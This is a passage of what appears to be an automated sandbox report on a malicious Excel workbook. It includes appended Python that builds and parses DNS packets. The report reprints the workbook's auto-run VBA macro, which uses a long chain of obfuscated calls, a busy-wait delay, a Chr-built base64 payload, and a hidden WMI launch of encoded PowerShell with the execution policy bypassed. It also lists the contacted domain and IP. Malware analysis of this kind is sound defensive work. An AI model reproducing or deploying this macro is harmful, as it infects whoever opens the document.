	ReDim bOut((((UBound(bIn) + 1) \ 4) * 3) - 1)
	' Each group of four 6-bit symbols yields three output bytes
	For lChar = 0 To UBound(bIn) Step 4
		lQuad = lPowers18(bTrans(bIn(lChar))) + lPowers12(bTrans(bIn(lChar + 1))) + _
				lPowers6(bTrans(bIn(lChar + 2))) + bTrans(bIn(lChar + 3))
		lTemp = lQuad And clHighMask
		bOut(lPos) = lTemp \ cl2Exp16
		lTemp = lQuad And clMidMask
		bOut(lPos + 1) = lTemp \ cl2Exp8
		bOut(lPos + 2) = lQuad And clLowMask
		lPos = lPos + 3
	Next lChar
	sOut = StrConv(bOut, vbUnicode)
	If iPad Then sOut = Left$(sOut, Len(sOut) - iPad)
	Decode64 = sOut
End Function


' Busy-wait delay; the DoEvents loop keeps Excel responsive while stalling
' execution (the "May sleep (evasive loops)" behaviour flagged above)
Public Sub Pause(sngSecs As Single)
	Dim sngEnd As Single
	sngEnd = Timer + sngSecs
	While Timer < sngEnd
		DoEvents
	Wend
End Sub


Private Function VerifyPath()
	Dim fileStr As String
	VerifyPath = Decode64(XUN_Status_IIWSY())
End Function

' Launches the decoded payload through WMI rather than Shell(), with a hidden
' window (ShowWindow = 0), so the child process is not a direct child of EXCEL.EXE
Private Sub CovidMap()
	Pause (6)
	Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
	Set objStartup = objWMIService.Get("Win32_ProcessStartup")
	Set objConfig = objStartup.SpawnInstance_
	objConfig.ShowWindow = 0
	Dim strstr As String
	strstr = "cmd.exe /c ""powershell -ExecutionPolicy BypasS -ENC " + StrConv(Decode64(XUN_Status_IIWSY()), vbFromUnicode) + """"
	Set objProcess = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
	objProcess.Create strstr, Null, objConfig, intProcessID
End Sub

' Auto-run entry point: fires as soon as macros are enabled, then walks a chain
' of randomly named wrapper subs before reaching the real work
Private Sub Workbook_Open()
	Call CCLMWCIDS()
End Sub
Public Sub CCLMWCIDS()
	Call BAWYHCKJY
End Sub
Public Sub BAWYHCKJY()
	Call QVLNNDSKO
End Sub
Public Sub QVLNNDSKO()
	Call KNNPPF
End Sub
Public Sub KNNPPF()
	Call JPRWYVV
End Sub
Public Sub JPRWYVV()
	Call KUROX
End Sub
                                                                                                                                              Public Sub KUROX()
                                                                                                                                              	Call JRXIGRYYS
                                                                                                                                              End Sub
                                                                                                                                              Public Sub JRXIGRYYS()
                                                                                                                                              	Call YPMONNH
                                                                                                                                              End Sub
                                                                                                                                              Public Sub YPMONNH()
                                                                                                                                              	Call COATGA
                                                                                                                                              End Sub
                                                                                                                                              Public Sub COATGA()
                                                                                                                                              	Call AQMDIAVR
                                                                                                                                              End Sub
                                                                                                                                              Public Sub AQMDIAVR()
                                                                                                                                              	Call BVPGJO
                                                                                                                                              End Sub
                                                                                                                                              Public Sub BVPGJO()
                                                                                                                                              	Call KXHYIJHM
                                                                                                                                              End Sub
                                                                                                                                              Public Sub KXHYIJHM()
                                                                                                                                              	Call NJMJWPKXQ
                                                                                                                                              End Sub
                                                                                                                                              Public Sub NJMJWPKXQ()
                                                                                                                                              	Call ALUJKC
                                                                                                                                              End Sub
                                                                                                                                              Public Sub ALUJKC()
                                                                                                                                              	Call DNSXAYNXP
                                                                                                                                              End Sub
                                                                                                                                              Public Sub DNSXAYNXP()
                                                                                                                                              	Call ZCJRIAGUQ
                                                                                                                                              End Sub
                                                                                                                                              Public Sub ZCJRIAGUQ()
                                                                                                                                              	Call ILLKSP
                                                                                                                                              End Sub
                                                                                                                                              Public Sub ILLKSP()
                                                                                                                                              	Call NEQOX
                                                                                                                                              End Sub
                                                                                                                                              Public Sub NEQOX()
                                                                                                                                              	Call KFUTZNLZL
                                                                                                                                              End Sub
                                                                                                                                              Public Sub KFUTZNLZL()
                                                                                                                                              	Call TLVGOS
                                                                                                                                              End Sub
                                                                                                                                              Public Sub TLVGOS()
                                                                                                                                              	Call OOTTQRB
                                                                                                                                              End Sub
                                                                                                                                              Public Sub OOTTQRB()
                                                                                                                                              	Call FLUZTZ
                                                                                                                                              End Sub
                                                                                                                                              Public Sub FLUZTZ()
                                                                                                                                              	Call CGZLOG
                                                                                                                                              End Sub
                                                                                                                                              Public Sub CGZLOG()
                                                                                                                                              	Call HFJWES
                                                                                                                                              End Sub
                                                                                                                                              Public Sub HFJWES()
                                                                                                                                              	Call XIPVTCZDC
                                                                                                                                              End Sub
                                                                                                                                              Public Sub XIPVTCZDC()
                                                                                                                                              	Call NSMUCQAR
                                                                                                                                              End Sub
                                                                                                                                              Public Sub NSMUCQAR()
                                                                                                                                              	Call LIOHCE
                                                                                                                                              End Sub
                                                                                                                                              Public Sub LIOHCE()
                                                                                                                                              	Call HGOJT
                                                                                                                                              End Sub
                                                                                                                                              Public Sub HGOJT()
                                                                                                                                              	Call JHHCFDZ
                                                                                                                                              End Sub
                                                                                                                                              Public Sub JHHCFDZ()
                                                                                                                                              	Call IZDFYVTMF
                                                                                                                                              End Sub
                                                                                                                                              Public Sub IZDFYVTMF()
                                                                                                                                              	Call JFXGQIB
                                                                                                                                              End Sub
                                                                                                                                              Public Sub JFXGQIB()
                                                                                                                                              	Call ROUSOTA
                                                                                                                                              End Sub
                                                                                                                                              Public Sub ROUSOTA()
                                                                                                                                              	Call JEMZL
                                                                                                                                              End Sub
                                                                                                                                              Public Sub JEMZL()
                                                                                                                                              	Call SJCJKCEIK
                                                                                                                                              End Sub
                                                                                                                                              Public Sub SJCJKCEIK()
                                                                                                                                              	Call AZZOPCRZ
                                                                                                                                              End Sub
                                                                                                                                              Public Sub AZZOPCRZ()
                                                                                                                                              	Call SMKCP
                                                                                                                                              End Sub
                                                                                                                                              Public Sub SMKCP()
                                                                                                                                              	Call KEXMPA
                                                                                                                                              End Sub
                                                                                                                                              Public Sub KEXMPA()
                                                                                                                                              	Call DNNNEG
                                                                                                                                              End Sub
                                                                                                                                              Public Sub DNNNEG()
                                                                                                                                              	Call YJIEAROTM
                                                                                                                                              End Sub
                                                                                                                                              Public Sub YJIEAROTM()
                                                                                                                                              	Call GNNYSJH
                                                                                                                                              End Sub
                                                                                                                                              Public Sub GNNYSJH()
                                                                                                                                              	Call MZAYGW
                                                                                                                                              End Sub
                                                                                                                                              Public Sub MZAYGW()
                                                                                                                                              	Call UUWMBBYKB
                                                                                                                                              End Sub
                                                                                                                                              Public Sub UUWMBBYKB()
                                                                                                                                              	 Call CovidMap()
                                                                                                                                              End Sub
                                                                                                                                              
                                                                                                                                              
                                                                                                                                              Private Function OTRB(RPNIKTOKD As String, NEUWH As String) As String
                                                                                                                                              OTRB = RPNIKTOKD + NEUWH
                                                                                                                                              End Function
                                                                                                                                              Private Function GYFM(FUUF As String, IFDHRCKM As Byte) As String
                                                                                                                                              GYFM = FUUF & Chr(IFDHRCKM)
                                                                                                                                              End Function
                                                                                                                                              Private Function FGLOUSGPMUJXUKN0() As String
                                                                                                                                                 Dim ZDOHNZM As String
                                                                                                                                              
                                                                                                                                                  ZDOHNZM = ""
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 87), 103), 66), 110), 65), 69), 73), 65), 77), 81), 66), 66), 65), 69), 99), 65), 78), 65), 66), 66)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 65), 70), 107), 65), 100), 119), 66), 67), 65), 68), 65), 65), 81), 81), 66), 72), 65), 71), 115), 65)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 81), 81), 66), 105), 65), 72), 99), 65), 81), 103), 66), 49), 65), 69), 69), 65), 81), 119), 66), 66)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 65), 69), 69), 65), 86), 81), 66), 66), 65), 69), 73), 65), 86), 65), 66), 66), 65), 69), 77), 65)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 77), 65), 66), 66), 65), 70), 77), 65), 85), 81), 66), 67), 65), 72), 85), 65), 81), 81), 66), 73)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 65), 69), 48), 65), 81), 81), 66), 107), 65), 69), 69), 65), 81), 103), 66), 111), 65), 69), 69), 65)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 82), 119), 66), 51), 65), 69), 69), 65), 89), 103), 66), 66), 65), 69), 73), 65), 98), 65), 66), 66)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 65), 69), 103), 65), 83), 81), 66), 66), 65), 70), 89), 65), 90), 119), 66), 66), 65), 72), 107), 65)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 81), 81), 66), 68), 65), 69), 69), 65), 81), 81), 66), 108), 65), 72), 99), 65), 81), 81), 66), 76)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 65), 69), 69), 65), 81), 119), 66), 66), 65), 69), 69), 65), 83), 81), 66), 66), 65), 69), 69), 65)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 90), 119), 66), 66), 65), 69), 77), 65), 81), 81), 66), 66), 65), 71), 77), 65), 81), 81), 66), 67)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 65), 71), 103), 65), 81), 81), 66), 73), 65), 69), 107), 65), 81), 81), 66), 90), 65), 70), 69), 65)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 81), 103), 66), 48), 65), 69), 69), 65), 81), 119), 66), 110), 65), 69), 69), 65), 81), 119), 66), 110)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 65), 69), 69), 65), 90), 119), 66), 66), 65), 69), 77), 65), 81), 81), 66), 66), 65), 69), 107), 65)
                                                                                                                                              
                                                                                                                                                  FGLOUSGPMUJXUKN0 = ZDOHNZM
                                                                                                                                              End Function
                                                                                                                                              
                                                                                                                                              Private Function FGLOUSGPMUJXUKN1() As String
                                                                                                                                                 Dim ZDOHNZM As String
                                                                                                                                              
                                                                                                                                                  ZDOHNZM = ""
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 81), 81), 66), 66), 65), 71), 99), 65), 81), 81), 66), 68), 65), 69), 69), 65), 81), 81), 66), 74)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 65), 69), 69), 65), 81), 81), 66), 110), 65), 69), 69), 65), 81), 119), 66), 66), 65), 69), 69), 65)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 86), 119), 66), 51), 65), 69), 73), 65), 85), 81), 66), 66), 65), 69), 99), 65), 82), 81), 66), 66)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 65), 71), 77), 65), 90), 119), 66), 67), 65), 71), 103), 65), 81), 81), 66), 72), 65), 68), 65), 65)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 81), 81), 66), 97), 65), 70), 69), 65), 81), 103), 65), 119), 65), 69), 69), 65), 82), 119), 66), 86)
                                                                                                                                                  ZDOHNZM = GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(GYFM(ZDOHNZM, 65), 69), 69), 65), 89), 119), 66), 110), 65), 69), 69), 65), 98), 119), 66), 66), 65), 69), 85), 65)

Streams

Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 623
Entropy: 5.20185927257
Base64 Encoded: True
Data ASCII: I D = " { 5 D D 9 0 D 7 6 - 4 9 0 4 - 4 7 A 2 - A F 0 D - D 6 9 B 4 6 7 3 6 0 4 E } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S e r v i c e A r r a y / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = A l t S v c A r r a y / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = A r c h i v e d A l t S v c s / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = 0 . . V e r s
Data Raw: 49 44 3d 22 7b 35 44 44 39 30 44 37 36 2d 34 39 30 34 2d 34 37 41 32 2d 41 46 30 44 2d 44 36 39 42 34 36 37 33 36 30 34 45 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 65 72 76 69 63 65 20 41 72 72 61 79 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 41 6c 74 20 53

Stream Path: PROJECTwm, File Type: data, Stream Size: 200
Entropy: 3.50754976555
Base64 Encoded: False
Data ASCII: T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S e r v i c e A r r a y . S . e . r . v . i . c . e . . A . r . r . a . y . . . A l t S v c A r r a y . A . l . t . . S . v . c . . A . r . r . a . y . . . A r c h i v e d A l t S v c s . A . r . c . h . i . v . e . d . . A . l . t . . S . v . c . s . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
Data Raw: 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 65 72 76 69 63 65 20 41 72 72 61 79 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 20 00 41 00 72 00 72 00 61 00 79 00 00 00 41 6c 74 20 53 76 63 20 41 72 72 61 79 00 41 00 6c 00 74 00 20 00 53 00 76 00 63 00 20 00 41 00 72 00 72 00 61 00 79 00 00 00 41 72 63 68 69

Stream Path: VBA/_VBA_PROJECT, File Type: ISO-8859 text, with no line terminators, Stream Size: 7
Entropy: 1.84237099318
Base64 Encoded: False
Data ASCII: . a . . . . .
Data Raw: cc 61 ff ff 00 00 00

Stream Path: VBA/dir, File Type: data, Stream Size: 343
Entropy: 6.00421995659
Base64 Encoded: False
Data ASCII: . S . . . . . . . . . . 0 . . . . . . . . H . . . . . . . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . . Q . T . . . " < . . . . . . D . . . . . . . . . T . h i s W o r k b @ o o k G . . . . . . h . i . s . W . . o . r . k . b . . . o . . . . / 2 . / . . u . H . . 1 . . . . . , . C . " . . + . . . . . . . . S e r v i c e . A r r a y G . < . . T . e . . v . 4 c . . . . A . . r . a . y . . . . . 2 . . . L A l t . S v c . L A . l . . t . / S . 5 c . L .
Data Raw: 01 53 b1 80 01 00 04 00 00 00 01 00 30 aa 02 02 90 09 00 20 14 06 48 03 00 a8 80 00 00 e9 fd 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 00 08 05 06 12 09 02 12 a5 95 1f 51 06 54 00 0c 02 22 3c 02 0a 0f 02 b6 05 44 00 13 02 07 ff ff 19 02 1d 54 00 68 69 73 57 6f 72 6b 62 40 6f 6f 6b 47 00 18 01 11 00 00 68 00 69 00 73

                                                                                                                                              Network Behavior

                                                                                                                                              Network Port Distribution

                                                                                                                                              TCP Packets

Timestamp                             Source Port  Dest Port  Source IP      Dest IP
Aug 26, 2021 07:29:22.394289017 CEST  49721        443        192.168.2.4    206.81.23.172
Aug 26, 2021 07:29:22.411844969 CEST  443          49721      206.81.23.172  192.168.2.4
Aug 26, 2021 07:29:22.411933899 CEST  49721        443        192.168.2.4    206.81.23.172
Aug 26, 2021 07:29:22.435472965 CEST  49721        443        192.168.2.4    206.81.23.172
Aug 26, 2021 07:29:22.452471972 CEST  443          49721      206.81.23.172  192.168.2.4
Aug 26, 2021 07:29:22.452541113 CEST  443          49721      206.81.23.172  192.168.2.4
Aug 26, 2021 07:29:22.452558041 CEST  443          49721      206.81.23.172  192.168.2.4
Aug 26, 2021 07:29:22.452626944 CEST  49721        443        192.168.2.4    206.81.23.172
Aug 26, 2021 07:29:22.474504948 CEST  49721        443        192.168.2.4    206.81.23.172
Aug 26, 2021 07:29:22.491761923 CEST  443          49721      206.81.23.172  192.168.2.4

                                                                                                                                              UDP Packets

Timestamp                             Source Port  Dest Port  Source IP    Dest IP
Aug 26, 2021 07:28:55.296292067 CEST  53723        53         192.168.2.4  8.8.8.8
Aug 26, 2021 07:28:55.336484909 CEST  53           53723      8.8.8.8      192.168.2.4
Aug 26, 2021 07:28:58.023885965 CEST  64646        53         192.168.2.4  8.8.8.8
Aug 26, 2021 07:28:58.059319019 CEST  53           64646      8.8.8.8      192.168.2.4
Aug 26, 2021 07:29:08.210992098 CEST  65298        53         192.168.2.4  8.8.8.8
Aug 26, 2021 07:29:08.246160984 CEST  53           65298      8.8.8.8      192.168.2.4
Aug 26, 2021 07:29:08.553311110 CEST  59123        53         192.168.2.4  8.8.8.8
Aug 26, 2021 07:29:08.605912924 CEST  53           59123      8.8.8.8      192.168.2.4
Aug 26, 2021 07:29:09.571216106 CEST  59123        53         192.168.2.4  8.8.8.8
Aug 26, 2021 07:29:09.603235960 CEST  53           59123      8.8.8.8      192.168.2.4
Aug 26, 2021 07:29:10.583844900 CEST  59123        53         192.168.2.4  8.8.8.8
Aug 26, 2021 07:29:10.629852057 CEST  53           59123      8.8.8.8      192.168.2.4
Aug 26, 2021 07:29:12.630846024 CEST  59123        53         192.168.2.4  8.8.8.8
Aug 26, 2021 07:29:12.663233042 CEST  53           59123      8.8.8.8      192.168.2.4
Aug 26, 2021 07:29:16.678802013 CEST  59123        53         192.168.2.4  8.8.8.8
Aug 26, 2021 07:29:16.711024046 CEST  53           59123      8.8.8.8      192.168.2.4
Aug 26, 2021 07:29:22.343941927 CEST  54531        53         192.168.2.4  8.8.8.8
Aug 26, 2021 07:29:22.382335901 CEST  53           54531      8.8.8.8      192.168.2.4
Aug 26, 2021 07:29:30.475161076 CEST  49714        53         192.168.2.4  8.8.8.8
Aug 26, 2021 07:29:30.517287016 CEST  53           49714      8.8.8.8      192.168.2.4
Aug 26, 2021 07:29:52.230443954 CEST  58028        53         192.168.2.4  8.8.8.8
Aug 26, 2021 07:29:52.318336964 CEST  53           58028      8.8.8.8      192.168.2.4
Aug 26, 2021 07:29:52.795416117 CEST  53097        53         192.168.2.4  8.8.8.8
Aug 26, 2021 07:29:52.824259996 CEST  53           53097      8.8.8.8      192.168.2.4
Aug 26, 2021 07:29:53.413409948 CEST  49257        53         192.168.2.4  8.8.8.8
Aug 26, 2021 07:29:53.445480108 CEST  53           49257      8.8.8.8      192.168.2.4
Aug 26, 2021 07:29:53.847980022 CEST  62389        53         192.168.2.4  8.8.8.8
Aug 26, 2021 07:29:53.916268110 CEST  49910        53         192.168.2.4  8.8.8.8
                                                                                                                                              Aug 26, 2021 07:29:53.947951078 CEST53623898.8.8.8192.168.2.4
                                                                                                                                              Aug 26, 2021 07:29:53.956883907 CEST53499108.8.8.8192.168.2.4
                                                                                                                                              Aug 26, 2021 07:29:54.479223967 CEST5585453192.168.2.48.8.8.8
                                                                                                                                              Aug 26, 2021 07:29:54.511307001 CEST53558548.8.8.8192.168.2.4
                                                                                                                                              Aug 26, 2021 07:29:54.877043009 CEST6454953192.168.2.48.8.8.8
                                                                                                                                              Aug 26, 2021 07:29:54.911900997 CEST53645498.8.8.8192.168.2.4
                                                                                                                                              Aug 26, 2021 07:29:55.409456968 CEST6315353192.168.2.48.8.8.8
                                                                                                                                              Aug 26, 2021 07:29:55.441365957 CEST53631538.8.8.8192.168.2.4
                                                                                                                                              Aug 26, 2021 07:29:56.022067070 CEST5299153192.168.2.48.8.8.8
                                                                                                                                              Aug 26, 2021 07:29:56.049211025 CEST53529918.8.8.8192.168.2.4
                                                                                                                                              Aug 26, 2021 07:29:56.711834908 CEST5370053192.168.2.48.8.8.8
                                                                                                                                              Aug 26, 2021 07:29:56.746714115 CEST53537008.8.8.8192.168.2.4
                                                                                                                                              Aug 26, 2021 07:29:57.206186056 CEST5172653192.168.2.48.8.8.8
                                                                                                                                              Aug 26, 2021 07:29:57.238344908 CEST53517268.8.8.8192.168.2.4
                                                                                                                                              Aug 26, 2021 07:30:09.885339022 CEST5679453192.168.2.48.8.8.8
                                                                                                                                              Aug 26, 2021 07:30:09.912684917 CEST53567948.8.8.8192.168.2.4
                                                                                                                                              Aug 26, 2021 07:30:10.071687937 CEST5653453192.168.2.48.8.8.8
                                                                                                                                              Aug 26, 2021 07:30:10.119339943 CEST53565348.8.8.8192.168.2.4
                                                                                                                                              Aug 26, 2021 07:30:12.918730974 CEST5662753192.168.2.48.8.8.8
                                                                                                                                              Aug 26, 2021 07:30:12.960963964 CEST53566278.8.8.8192.168.2.4
                                                                                                                                              Aug 26, 2021 07:30:46.759615898 CEST5662153192.168.2.48.8.8.8
                                                                                                                                              Aug 26, 2021 07:30:46.805885077 CEST53566218.8.8.8192.168.2.4
                                                                                                                                              Aug 26, 2021 07:30:49.164696932 CEST6311653192.168.2.48.8.8.8
                                                                                                                                              Aug 26, 2021 07:30:49.216119051 CEST53631168.8.8.8192.168.2.4

DNS Queries

Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name            Type            Class
Aug 26, 2021 07:29:22.343941927 CEST  192.168.2.4  8.8.8.8  0xb1df    Standard query (0)  awmelisers.com  A (IP address)  IN (0x0001)

DNS Answers

Timestamp                             Source IP  Dest IP      Trans ID  Reply Code    Name            CName  Address        Type            Class
Aug 26, 2021 07:29:22.382335901 CEST  8.8.8.8    192.168.2.4  0xb1df    No error (0)  awmelisers.com         206.81.23.172  A (IP address)  IN (0x0001)
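
The two DNS rows above are the wire-format fields of one exchange: the query carries transaction ID 0xb1df, opcode 0 (standard query), QNAME awmelisers.com, QTYPE A and QCLASS IN; the reply echoes the ID and question and adds an A record for 206.81.23.172 with RCODE 0. The packet list pairs them by the same ID and the mirrored port pair (54531 to 53, then 53 back to 54531). The following Python is an added example, not part of the report or of Joe Sandbox: it builds the query and the answer with exactly those values using only `struct`, parses both back, and checks that the answer belongs to the query. The TTL (300) is a constructed placeholder because the report shows none, and nothing here touches the network; the domain and address are copied from the rows above as indicators, not resolved.

```python
import struct

QTYPE_A = 1     # "A (IP address)" in the report's Type column
QCLASS_IN = 1   # "IN (0x0001)" in the Class column


def encode_name(name: str) -> bytes:
    r"""'awmelisers.com' -> b'\x0aawmelisers\x03com\x00' (length-prefixed labels)."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def build_query(txid: int, name: str) -> bytes:
    # flags 0x0100: QR=0 (query), OPCODE=0 (standard query), RD=1; one question, no answers
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", QTYPE_A, QCLASS_IN)


def build_a_response(txid: int, name: str, ip: str, ttl: int) -> bytes:
    # flags 0x8180: QR=1 (response), OPCODE=0, RD=1, RA=1, RCODE=0 ("No error (0)")
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)
    question = encode_name(name) + struct.pack("!HH", QTYPE_A, QCLASS_IN)
    rdata = bytes(int(octet) for octet in ip.split("."))
    # 0xC00C is a compression pointer to the QNAME at offset 12 (right after the header)
    answer = b"\xc0\x0c" + struct.pack("!HHIH", QTYPE_A, QCLASS_IN, ttl, len(rdata)) + rdata
    return header + question + answer


def read_name(data: bytes, off: int):
    """Decode a possibly compressed name; return (name, offset just after it)."""
    labels, jumped, end, hops = [], False, off, 0
    while True:
        length = data[off]
        if length & 0xC0 == 0xC0:            # compression pointer: 2 bytes, 14-bit offset
            if not jumped:
                end = off + 2                # the field ends after the first pointer
            off = ((length & 0x3F) << 8) | data[off + 1]
            jumped = True
            hops += 1
            if hops > 16:                    # refuse pointer loops in hostile input
                raise ValueError("compression pointer loop")
            continue
        off += 1
        if length == 0:
            break
        labels.append(data[off:off + length].decode("ascii"))
        off += length
    if not jumped:
        end = off
    return ".".join(labels), end


def parse_dns(data: bytes) -> dict:
    """Parse header, question section and answer section (A records decoded to dotted IPv4)."""
    txid, flags, qdcount, ancount, _ns, _ar = struct.unpack("!HHHHHH", data[:12])
    msg = {"id": txid, "qr": flags >> 15, "opcode": (flags >> 11) & 0xF,
           "rcode": flags & 0xF, "questions": [], "answers": []}
    off = 12
    for _ in range(qdcount):
        name, off = read_name(data, off)
        qtype, qclass = struct.unpack("!HH", data[off:off + 4])
        off += 4
        msg["questions"].append({"name": name, "type": qtype, "class": qclass})
    for _ in range(ancount):
        name, off = read_name(data, off)
        rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", data[off:off + 10])
        off += 10
        rdata = data[off:off + rdlen]
        off += rdlen
        record = {"name": name, "type": rtype, "class": rclass, "ttl": ttl}
        if rtype == QTYPE_A and rdlen == 4:
            record["address"] = ".".join(str(b) for b in rdata)
        msg["answers"].append(record)
    return msg


def is_reply_to(query: bytes, response: bytes) -> bool:
    """Same pairing rule the packet list implies: matching ID, QR flipped, same question."""
    q, r = parse_dns(query), parse_dns(response)
    return q["qr"] == 0 and r["qr"] == 1 and q["id"] == r["id"] and q["questions"] == r["questions"]


if __name__ == "__main__":
    # values from the report's DNS rows; TTL is a constructed placeholder
    query = build_query(0xB1DF, "awmelisers.com")
    reply = build_a_response(0xB1DF, "awmelisers.com", "206.81.23.172", 300)
    print(parse_dns(query))
    print(parse_dns(reply))
    print("reply matches query:", is_reply_to(query, reply))
```

The ID plus question comparison in `is_reply_to` is what makes a resolver accept a response; a sniffer correlating sandbox traffic should use the same rule together with the UDP port pair rather than timestamps alone, because the packet list shows bursts (07:29:53.847 and 07:29:53.916) where two queries are in flight at once.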

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

Behavior

System Behavior

General

Start time: 07:29:06
Start date: 26/08/2021
Path: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Imagebase: 0x9b0000
File size: 27110184 bytes
MD5 hash: 5D6638F2C8F8571C593999C58866007E
